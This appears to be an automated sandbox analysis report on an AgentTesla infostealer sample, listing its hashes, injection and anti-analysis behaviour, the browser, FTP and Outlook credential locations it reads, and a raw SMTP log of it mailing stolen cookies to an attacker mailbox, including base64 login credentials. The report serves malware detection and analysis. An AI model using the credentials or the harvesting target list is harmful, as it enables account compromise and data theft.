1
2* ID: 1233
3* MalFamily: "AgentTesla"
4
5* MalScore: 10.0
6
7* File Name: "AgentTesla_01233c83b6f43d3afa5dc713ee7006b4.exe"
8* File Size: 872960
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "ed7feeee9e42840735b25547ea1146306f3b6f8aaefda21d0debdf9bdaa66ea7"
11* MD5: "01233c83b6f43d3afa5dc713ee7006b4"
12* SHA1: "e3d17559c8ab67ad9aa66c29390a42aad459e1dd"
13* SHA512: "4409df1287a2c84488409ac1ae29483f853ff7bee187b2305236bbca6086450b6490d619f0e4d7940abae4d9a29d60d3ef4648452a9561d74d778c2745fa5bef"
14* CRC32: "81106E86"
15* SSDEEP: "12288:vE3cSZnbcNHy9XUhrUGIYsxqrKRoF1V14H8zqFzHVDYpk2OAAx8IrdqqavEHAoeH:vscEaSVUhrBGG5F17F+jkp2EBva7eH"
16
17* Process Execution:
18 "1dEcdkZp.exe",
19 "walafk.exe",
20 "walafk.exe",
21 "services.exe",
22 "svchost.exe",
23 "WmiPrvSE.exe",
24 "lsass.exe"
25
26
27* Executed Commands:
28 "\"C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe\"",
29 "C:\\Windows\\system32\\lsass.exe"
30
31
32* Signatures Detected:
33
34 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
35 "Details":
36
37
38 "Description": "Behavioural detection: Executable code extraction",
39 "Details":
40
41
42 "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
43 "Details":
44
45 "IP_ioc": "199.79.63.211:587 (United States)"
46
47
48
49
50 "Description": "Creates RWX memory",
51 "Details":
52
53
54 "Description": "Guard pages use detected - possible anti-debugging.",
55 "Details":
56
57
58 "Description": "A process attempted to delay the analysis task.",
59 "Details":
60
61 "Process": "walafk.exe tried to sleep 1521 seconds, actually delayed analysis time by 0 seconds"
62
63
64 "Process": "WmiPrvSE.exe tried to sleep 602 seconds, actually delayed analysis time by 0 seconds"
65
66
67
68
69 "Description": "Drops a binary and executes it",
70 "Details":
71
72 "binary": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe"
73
74
75
76
77 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
78 "Details":
79
80 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
81
82
83 "suspicious_request_iocs": "http://checkip.amazonaws.com/"
84
85
86
87
88 "Description": "Performs some HTTP requests",
89 "Details":
90
91 "url_iocs": "http://checkip.amazonaws.com/"
92
93
94
95
96 "Description": "The binary likely contains encrypted or compressed data.",
97 "Details":
98
99 "section": "name: .rsrc, entropy: 7.57, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00045400, virtual_size: 0x0004528c"
100
101
102
103
104 "Description": "Behavioural detection: Injection (Process Hollowing)",
105 "Details":
106
107 "Injection": "walafk.exe(1376) -> walafk.exe(1824)"
108
109
110
111
112 "Description": "Executed a process and injected code into it, probably while unpacking",
113 "Details":
114
115 "Injection": "walafk.exe(1376) -> walafk.exe(1824)"
116
117
118
119
120 "Description": "Sniffs keystrokes",
121 "Details":
122
123 "SetWindowsHookExW": "Process: walafk.exe(1824)"
124
125
126
127
128 "Description": "Behavioural detection: Injection (inter-process)",
129 "Details":
130
131
132 "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
133 "Details":
134
135
136 "Description": "Tries to unhook or modify Windows functions monitored by Cuckoo",
137 "Details":
138
139 "unhook": "function_name: NtCreateSection, type: modification"
140
141
142
143
144 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
145 "Details":
146
147 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10991925 times"
148
149
150
151
152 "Description": "Steals private information from local Internet browsers",
153 "Details":
154
155 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
156
157
158 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
159
160
161
162
163 "Description": "File has been identified by 41 Antiviruses on VirusTotal as malicious",
164 "Details":
165
166 "MicroWorld-eScan": "Trojan.GenericKD.41705566"
167
168
169 "McAfee": "RDN/Generic.grp"
170
171
172 "Cylance": "Unsafe"
173
174
175 "BitDefender": "Trojan.GenericKD.41705566"
176
177
178 "K7GW": "Trojan ( 005573421 )"
179
180
181 "CrowdStrike": "win/malicious_confidence_100% (W)"
182
183
184 "TrendMicro": "TROJ_FRS.VSNTI519"
185
186
187 "F-Prot": "W32/Delf.IX.gen!Eldorado"
188
189
190 "ESET-NOD32": "a variant of Win32/Injector.EHQI"
191
192
193 "APEX": "Malicious"
194
195
196 "Avast": "Win32:Trojan-gen"
197
198
199 "GData": "Trojan.GenericKD.41705566"
200
201
202 "Kaspersky": "HEUR:Trojan.Win32.Crypt.gen"
203
204
205 "Paloalto": "generic.ml"
206
207
208 "AegisLab": "Trojan.Multi.Generic.4!c"
209
210
211 "Endgame": "malicious (high confidence)"
212
213
214 "F-Secure": "Trojan.TR/Kryptik.lntpi"
215
216
217 "DrWeb": "Trojan.PWS.Stealer.19347"
218
219
220 "Invincea": "heuristic"
221
222
223 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.cc"
224
225
226 "Trapmine": "malicious.moderate.ml.score"
227
228
229 "FireEye": "Generic.mg.01233c83b6f43d3a"
230
231
232 "Emsisoft": "Trojan.GenericKD.41705566 (B)"
233
234
235 "SentinelOne": "DFI - Suspicious PE"
236
237
238 "Cyren": "W32/Delf.IX.gen!Eldorado"
239
240
241 "Avira": "TR/Kryptik.lntpi"
242
243
244 "Microsoft": "Trojan:Win32/lokibot.SI!MTB"
245
246
247 "Arcabit": "Trojan.Agent.EDGB"
248
249
250 "ZoneAlarm": "HEUR:Trojan.Win32.Crypt.gen"
251
252
253 "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
254
255
256 "Ad-Aware": "Trojan.Agent.EDGB"
257
258
259 "Malwarebytes": "Trojan.MalPack.DLF"
260
261
262 "TrendMicro-HouseCall": "TROJ_FRS.VSNTI519"
263
264
265 "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
266
267
268 "Ikarus": "Trojan.Win32.Krypt"
269
270
271 "Fortinet": "W32/Injector.EHDJ!tr"
272
273
274 "Webroot": "W32.Trojan.Gen"
275
276
277 "AVG": "Win32:Trojan-gen"
278
279
280 "Cybereason": "malicious.9c8ab6"
281
282
283 "Panda": "Trj/CI.A"
284
285
286 "Qihoo-360": "HEUR/QVM05.1.ACA2.Malware.Gen"
287
288
289
290
291 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
292 "Details":
293
294
295 "Description": "Creates a copy of itself",
296 "Details":
297
298 "copy": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe"
299
300
301
302
303 "Description": "Harvests credentials from local FTP client software",
304 "Details":
305
306 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
307
308
309 "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\"
310
311
312 "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml"
313
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
316
317
318 "file": "C:\\Users\\user\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
319
320
321 "file": "C:\\cftp\\Ftplist.txt"
322
323
324 "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
325
326
327
328
329 "Description": "Harvests information related to installed mail clients",
330 "Details":
331
332 "file": "C:\\Users\\user\\AppData\\Roaming\\Thunderbird\\profiles.ini"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
381
382
383
384
385 "Description": "Makes SMTP requests, possibly sending spam or exfiltrating data.",
386 "Details":
387
388 "SMTP": "199.79.63.218 (us3.smtp.mailhostbox.com)"
389
390
391
392
393 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
394 "Details":
395
396 "file": "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe:ZoneIdentifier"
397
398
399
400
401 "Description": "Collects information to fingerprint the system",
402 "Details":
403
404
405 "Description": "Anomalous binary characteristics",
406 "Details":
407
408 "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
409
410
411
412
413
414* Started Service:
415 "VaultSvc"
416
417
418* Mutexes:
419 "Global\\CLR_PerfMon_WrapMutex",
420 "Global\\CLR_CASOFF_MUTEX",
421 "Global\\.net clr networking",
422 "Local\\_!MSFTHISTORY!_",
423 "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
424 "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
425 "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!"
426
427
428* Modified Files:
429 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe",
430 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe:ZoneIdentifier",
431 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
432 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
433 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
434 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default\\Cookies",
435 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1.zip",
436 "C:\\Users\\user\\AppData\\Roaming\\DmzXBTkF7B.jpeg",
437 "C:\\Users\\user\\AppData\\Roaming\\CcmAKWrq5r.jpeg",
438 "C:\\Users\\user\\AppData\\Roaming\\Bzs5jkdOwZ.jpeg",
439 "C:\\Users\\user\\AppData\\Roaming\\Ay41cTrAQU.jpeg",
440 "C:\\Users\\user\\AppData\\Roaming\\K960sd8oiN.jpeg",
441 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
442 "\\??\\WMIDataDevice",
443 "\\??\\PIPE\\wkssvc",
444 "\\??\\PIPE\\srvsvc"
445
446
447* Deleted Files:
448 "C:\\Users\\user\\AppData\\Roaming\\walakru\\walafk.exe",
449 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default\\Cookies",
450 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome\\Default",
451 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1\\Chrome",
452 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1",
453 "C:\\Users\\user\\AppData\\Roaming\\svuszppr.ac1.zip"
454
455
456* Modified Registry Keys:
457 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\walafk_RASAPI32",
458 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\EnableFileTracing",
459 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\EnableConsoleTracing",
460 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\FileTracingMask",
461 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\ConsoleTracingMask",
462 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\MaxFileSize",
463 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\walafk_RASAPI32\\FileDirectory",
464 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type"
465
466
467* Deleted Registry Keys:
468
469* DNS Communications:
470
471 "type": "A",
472 "request": "checkip.amazonaws.com",
473 "answers":
474
475 "data": "52.55.255.113",
476 "type": "A"
477
478
479 "data": "52.44.169.135",
480 "type": "A"
481
482
483 "data": "checkip.us-east-1.prod.check-ip.aws.a2z.com",
484 "type": "CNAME"
485
486
487 "data": "18.205.71.63",
488 "type": "A"
489
490
491 "data": "checkip.check-ip.aws.a2z.com",
492 "type": "CNAME"
493
494
495 "data": "18.214.132.216",
496 "type": "A"
497
498
499 "data": "3.224.145.145",
500 "type": "A"
501
502
503 "data": "34.196.181.158",
504 "type": "A"
505
506
507
508
509 "type": "A",
510 "request": "us3.smtp.mailhostbox.com",
511 "answers":
512
513 "data": "199.79.63.211",
514 "type": "A"
515
516
517 "data": "199.79.63.218",
518 "type": "A"
519
520
521
522
523
524* Domains:
525
526 "ip": "199.79.63.218",
527 "domain": "us3.smtp.mailhostbox.com"
528
529
530 "ip": "34.196.181.158",
531 "domain": "checkip.amazonaws.com"
532
533
534
535* Network Communication - ICMP:
536
537* Network Communication - HTTP:
538
539 "count": 1,
540 "body": "",
541 "uri": "http://checkip.amazonaws.com/",
542 "user-agent": "",
543 "method": "GET",
544 "host": "checkip.amazonaws.com",
545 "version": "1.1",
546 "path": "/",
547 "data": "GET / HTTP/1.1\r\nHost: checkip.amazonaws.com\r\nConnection: Keep-Alive\r\n\r\n",
548 "port": 80
549
550
551
552* Network Communication - SMTP:
553
554 "raw": "EHLO Host\r\nAUTH login d2FsYUBsb2dyb29tLnRvcA==\r\nXnQjck9WUTk=\r\nMAIL FROM:<wala@logroom.top>\r\nRCPT TO:<wala@logroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: wala@logroom.top\r\nTo: wala@logroom.top\r\nDate: 6 Sep 2019 07:47:39 -0700\r\nSubject: user/Host Recovered Cookies\r\nContent-Type: multipart/mixed; boundary=--boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\n\r\n\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 09/06/2019 06:57:17<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Microsoft Windows 7 Enterprise N <br>CPU: Intel(R) Core(TM)CPU E5-2670=\r\n 0 @ 2.60GHz<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d\r\nContent-Type: application/octet-stream; name=svuszppr.ac1.zip\r\nContent-Transfer-Encoding: base64\r\n\r\nUEsDBBQAAAgIAO5BEU+6/tz3dBIAAABQAAAjAAAAc3Z1c3pwcHIuYWMxL0Nocm9tZS9EZWZh\r\ndWx0L0Nvb2tpZXPtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymr\r\nKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwf\r\nPyJe/8Tzos3T86peZG1679f4zX6NX/PX/DV+zzT9NX4N+vXX+DV+3V/DPb8W/f/X8f7+Nb3f\r\nh57f7NcY7zz6jX/T/+3X+HV+4+Nf4ze9+E3/xd/4+Dc9uPGtHz0/en70/Oj50fOj50fPj54f\r\nPT96fvT86Pl/4/OHtr/2r//b/o6/46/5R/4ebTYp82lVvS3yRn/8OievTo/fnKZvjp88P031\r\nw3RrWudZW1TL33/dTtOzF29OPz99lb748k364qvnz0fzqml//7f5dfrm9Pd+4z5eZou889Fl\r\nVq67n62ydt75KH+3Kuq8ifdWNL9/k0/XdR79at62q2pZXve/LDPCMptO82YAcDrPmt9fu+59\r\nmz49fXb81fM36e4opW5Wed0UTZsv200tV3VR1UXbR8Zrky+n9fWqzWe/vxDnyfMvn9ivP/54\r\ndF7UTbvK6vY6OizbdGf01Yuzn/jqNN0y0zFKMQOjFAS+c2f71/n1ftvj3/HX/DWK5Sx/1/yi\r\nkoLo3z9btxX//fvrTP/+u/rLr3v+a/76v+1v/Vv/mn/wXWaSRd5m+P+vFbAHPtnCvD//8sXn\r\nP3n86uTbxx5iis7LV2dfHL/6fdLf6/T3GaUyRK/5nY9/rV/vtz38rYfQQg+//y7+/bWJc38D\r\nsO9vTP//tX/Tf+TX+E3/h9/0P6IfP3p+9Pzo+dHzo+dHz4+eHz0/en70/Oj50fOj50fPj57/\r\nVz6/06/9ax/+5pyNmVYLSk4UlGD4/S+RUKmWuzu/0a/1a/+Ov7n96zf7NX/tH//NF4ts9fs3\r\nbdaum+3d5
NdA/P9P/xq/6T/9m/7Pv+l/fmNnP3p+9Pzo+dHzo+dHz4+eHz0/en70/Oj50fOj\r\n50fPj56fy+d3/LUPf82BLMCv/Rv+2r/jr6m//1q/ya/94z/mZQB+Y3r1x36tf+fX+I1/5jf8\r\n637sP/8N/qDf5N//df/UX+cnfr1/iD760fOj5//Dzx/S/oa/2a/347/1b/w7/no/9mP0vx/7\r\nw979Br/G+H/4L/+9e9/7peOLqroo8zGJyusXZ0/vkmwU59e/xvj/PNvd+tW/1LT6NQnIv/TH\r\n/fn/4a/5W//Lv/kf94Nf4x/68h/5M/9bfPb5P/dP/g1f/M3f+/Iv/WsWf8ufXVX/Ejr7tbjL\r\n3+yc/qEmKf34BWd/+O/5j/5j3/6//pU/Kf8H/si/8Hfe+sn/4foPerrzT/wl/+Tuv/Nb/B7N\r\nP/LPov1v8gfJq2j/E//Lb/T3/LZ/5q/z6lf9+J/0f/yZH/0dT97+8//a3/Avpl/8TT9+5yd+\r\ns5/6dX67P+YPoDb/yi/4ff7TX/u3+uP+y+u/7I//X/74v+7j2e/5W3z1r/zRn/wXf9vib/8d\r\n/+n1P/gL/rW/6u/+7f+NP+U/+1MP/5R/+Sc+e/2r/ox/5+//1/6yn/p1/5x//n/9t//u33r1\r\n75wXv9F/84/+W6v23n/zd//3f/GP/8errT/yV35v/F/8aX/nv/XH/QkP/vYvv/e3/a+/5d3f\r\nk/q4+53/6bf5I3/Jf3/vr/zHfjAv/+Pf+p/+O/+3f+rh9Q/+qJ/89T/7bf+wk//7H/g9Tx/8\r\n8//cH/AH/OV/9K/9y36w96//N7/ps7/87z35W/+Ot/f+mJ/8Tf793++X/dI/9t/7Q36PH/vN\r\nfr07v/lv/Jv+er/Bb8Bk/+2E7J/9Jv/k1dWVR/mnP3kXX/zf/9u3fg3T4MMo/hf80X/Ev/i/\r\nFX/Yb/2vH/+an3/8f/9Ws3/l6fdXv/i/fLj9z289+NdH3/7OqEvxf+VfO/8H/vL/48X/Mvr4\r\nD/h9/5fv/8X/9b/9l/6l//Bf/TN/8r2Tv+D5xS/9J9O/d4fa/B9/16/14lf+Rf/Sn/mn/7r1\r\n3/4v/02/41/0+/1l//ff/d/8zj/z63707/3GP/1v/bv/8Kd/x5+Sffdf/6P+8Lftv/ny0f0/\r\n50/8C0HBj/6Ih//68k/+x/7+P/m/+eRP/8+/+zf+6f/Tn/Of/G/v/o9nv/8f92v/en/Rb/df\r\n/Bu//5/9z/9ly9/++R9/+fH13/tH/qGTP+Pib/w7/ovnH/0Vf8+f/uv/Y3/4f/J//4//yx/1\r\nh3zrN/jNfr3f9Te1FPxDlXF3/6yr8XU2rypQ78ndX+Pub/hnzE/fXZnvPox4/+EvuvNf/YP/\r\n0U+VP/Vn7vyyf/33+7PePvo//vKv7vz3H/019/6EP2L9b37xv/61XeL9CX/af/Rb/5Lv/1X/\r\n6F/3u/2pf+m//Mf/Gb/h9/6I+S84+I/fvPv7/8J/9dv3PvmdrtDmL/qv/8SDX3Z+decvevQ/\r\n/bm/7V/1+34//zd+q0/K/+j3vPgN/rw/5aOfXv5xfw2I9d//A//nr/vf/iu/+7//7/4j23/J\r\nTx58sfV/fPzuz/tPfvW35m/++N/rP/9Nf9F/l/5Hf8Hv8kf9xr/e9//8v+7wH/lFV8e/7N/+\r\ntz75hX/mf/1fPtz9l/7St7/hP/B/vPw9/tDPEpLy3xLEYin/I5Tdfvf/9m/weA1CzuL9O/6x\r\nf4P5+sPo9ev/gsff/oue/sufj/7Iv+J3+Hf+iL/k7/vP/5u/4vqjn3r1H/6nv/1/+Sf/gb/t\r\n6k/p0uv+H77zt60/+o/+qtlv9Qf9D//wr/2v/yPL9N/8rf7b3/oP+puTH/yX6V/yF7/9A/8m\r\navM7/u2/4jdI69/mf/zN/9m/9L//o/+Uv
/y3+qd//Df7/sFPNr/6u7/W5//u/T/+r/hd/prf\r\n49c9+r/+x//998v/kH/6j/+b/vE/48//c/6x53/Jn/Q77vwvd//9//snP1n/bf/5H/rf/6pv\r\nP/w1v/enffxjv/3v8d1//V/8H3+jlzt/9K/zr/85v99v+vv91F/92/1XT36zP/zv/tvu/tGf\r\n/MO/65//l/2lv/nbav6b7f6S+f/4R/zqL//98k/5k39F/a9+9i9+59f5b0b/4f4/9VdP66d/\r\n7i/7W/7z//Cvv3j91/zee3/0f7z1L/yuf/a/+3f9Zn/5P/idf+Av+lW/7T/+G/3kn/Vb7P6Z\r\n3373PczfP/7Zf/zq9/kX/4t/88/+TR79V3/d//SP3Pnf/4Xz32H5R/zff9zf9H//Tv/uH/zH\r\nzX7T13/Y7/br/z7/5h/3H/wJf8bf9Vf/c7/ij/gVv9Hyf/s7/83/7AeP/7j/63f/X37ZP/Lu\r\nd/pDJr/ub/brbbv5+8N+b5q//+pP/A3+4z/zPxnPqjV5MdOymL4dL/P27OkpMf3v+t/9rj/2\r\n3f/EtPmwSTz+x//AP/Sv/j//kT/oyR/9f5Z/w8Vf+vf+s4t/+eQPav7gv/ev+wvy/y77id/h\r\nz+hO4t3f5b/4m//x33j6zx38EV8sd//z3/if2/sf/4DR9Pf/7f6tv/i/+8++vfgj/sJ/6SW1\r\n+Wv/5f919Tf+OX/E01/zL/+rv/MnfOcv+TV++r/6c/+Af/7ij/8zft+/6k/7+B/4A8/+sl/v\r\nN/rTf4NP/pi/4O//O+qf/J/+7J+4+5v8vv92+lf8a3/Ev5T+pf/eX/pHlT/9L/0L//3rv+0v\r\n/c1/1b/2l/3fv92/+1c8+rN+n/8ZRP7eX/Xr/ZEP/5q//mzy3/21/+If9Wv+TX/Y2Z/29s95\r\n89f8I//Ef/un/JV/0i//O/+cX/Gf3J/9H//u3/iX/bV/zR/0+/07r7/8/f+o9Ff9S3/7j/3+\r\n/9Lf8L3vffd3/stH35r+oU9/HTWFnpAQAf/xP++NJyQnn5+d3G3yrJ7Of43x//q3/Tr3f6c3\r\nLCs//rvVH0bm//Mf/3f/8j/jH/mb/qO//Df/zf6a4tf7o77zb/8Zv9vf8smb/+3v/K3/uz/4\r\np3/yt3n9C7tk/uue/C2n1V/5M//rH538t7/64cvf8K/ZfVD/nf/SH13Ws3/zN3v67/1z/80f\r\n9jdRm7/k7/hzfuzNr/+P/8W/8p969ttt/RqLP+9/+Ht+6Xeyv/v/+k3SX+N//q3/oD/5Z/7F\r\n3/SXHv+av8v4+nf/J/7x/+7//vJf+8/+kd/89X/7R/wDv+mf/uf+Hf/eL/0r//unv9Gn/8K/\r\n9E//zG/+E//F//Kv/w6/xf/+3/0TD88P/vVf9Js8f/kn/uu/1V/4/V/rf/rWr0r/xL/xtxn/\r\nlX/Lf/w7/6p/+e/4XY7/kMVf8ad99s/+tf/533j8Zx/9etd/9fTf/yv+4l/4j/z6n/7Tf87j\r\nf/s//Y3/2P/6z0nv/2/Pf8t/5Pf5/X7pT8//63//7eIv/MH0X/8T/5U/4G/7Nx/+q3/JH3/+\r\ne3/rD/17/q9vYRrTf+fv++V/9//0D/7fv+xP2/sVd3+73+FXfvHL7vw2v9tf9q/8X7/2vb/h\r\nV/ylf8+jf+Q/+N2+f+dP/0UP/rB/4t/9PT77j//ef+sv+f4f8NUf+Oiv+1/+z6u/7t/9E/+s\r\n/2L2P/6hX/zaPI3bvWn8qDuNCALKvM3D+fwI8/nv/hN/7m/3YfP5W//JO//Yv/f9f+I3bf/H\r\nn/wbH/2ln/0Rf9SdH/tn53/7//QX/TX/8n8y/4W/9u/xJ3Xnc/lX/Z//4n/8u/3Bya/3j/75\r\n//vv9Vv8KyfNX/R/1qsf/OTPHP+H/9rv9t/8iuTfxXz+we/+qF/3rz36o
0a/x8Ev+93/uj/2\r\n3a/z5Nf683+937r8G//v7/72f8Of+PaX/or/4Q//73/Hv+/PfLr+B37xX/v6Lz795a//rL/x\r\nP1ymr/6Ol3/Xn3fnv/0Vr/6bw+n6X/xDfpvf5tff/WN+v1f/3eo3Ov9P/9yf+Wc++3v/x98x\r\n/89+t7/1d/3L/+lP15/9Bx//fX/rv/0v/fSf86v+/Xe/8b/0j83+xX/14V/8W/1vV+Nf8nv8\r\n1t/91u96+dc++DP+yI/+pu/+X3/+r/dn/fP/1f/0x/9j/+rv+Tuc/bEvv/X7/Qvf/j3+3d94\r\n8VP/2P/25/5zh//3b/PVH7L3y/703+p/+PN+8Gv9vr8O5vNf+8f/k//iP/gn/qjf6zf/fX63\r\nf/OL36k6+WW//z/xLxQHf8mf//3//Nf8i16t/vA/4z//9T+anP9df8+rv//3/0t/nT/3b7/6\r\nV/+K/+I3+p/+8L/9r27/+L+9+Kt/0e/1m3z3D/n9fi2ez67u+4/+wtqbz2M2XtB7v8HvX38z\r\nE/jFb/JX5r/53/Fb/If/4S/9Df6Gf+Nv+JXjv+ruf/FLL//UP+j0H/rrfpO/f/kHfPWvdCfw\r\n7uM//zf5v/7W6b949Tf/D3/F3uE/d/QHvvx1f/O/7T/5DX7T3/57v9+vn/w3v2P2ktr8hf/E\r\nX/9H/2Wf/ub/w1/67/13/0fy3/wu/9rf9IN/7Zf/5D+9+4v/qX/nf/yD//yzv+Ff/g//lr/s\r\n+vf4G/647/5Nf8nvc/lvXP1Nv+jfuvOTv+NP/Hp7f9Ff9Fv9C09/6cEf/Ff8iX//n/13/wF/\r\n/3/3N/863/4jf+of+K+f/5Mg8K/1P/7mf+vhX/on/5r/2k/9B7/OH7z49//cP+bTvb/8P/wn\r\n/73/7MFP/Do/+FPTf/KP+n1O/sq/8Df8R/+X3+Gv+nV+9R/0u/4tv9ev+T/+J//qP/D7P/4D\r\n/oCtf/BX/1+/6r/7k/+nPyT99YnAv73zpH5vcQ4Ov/ufeATeffn7f+f4FfkH//PJ9+rf7dcw\r\nLT6MxP/8v/Rf/Ybf+dXf+rX+uX/2L/3r/7Lf+Nf8Hf6drR9/+2v+yv/8/OJP+xPH/97Fr77q\r\nkvgf/sd+Wft/P/yN/5xf+snot/iF/9jkcvY//9V/wV/+y37J7/jXlzvb/+Gf+++/+s2ozfhf\r\n/OoHO3/eb5X9zL+ePvu1f/+f+Rwkuv6j//i/6u/7N3/n3+/v+q+/8z996299s//v/Gnf+vd/\r\n6z/u33/z1//x//h/dPx//dsnf+mf9Ff96l/7F33ryaP71//zH/NXfpwVv+6//+f++3/0xe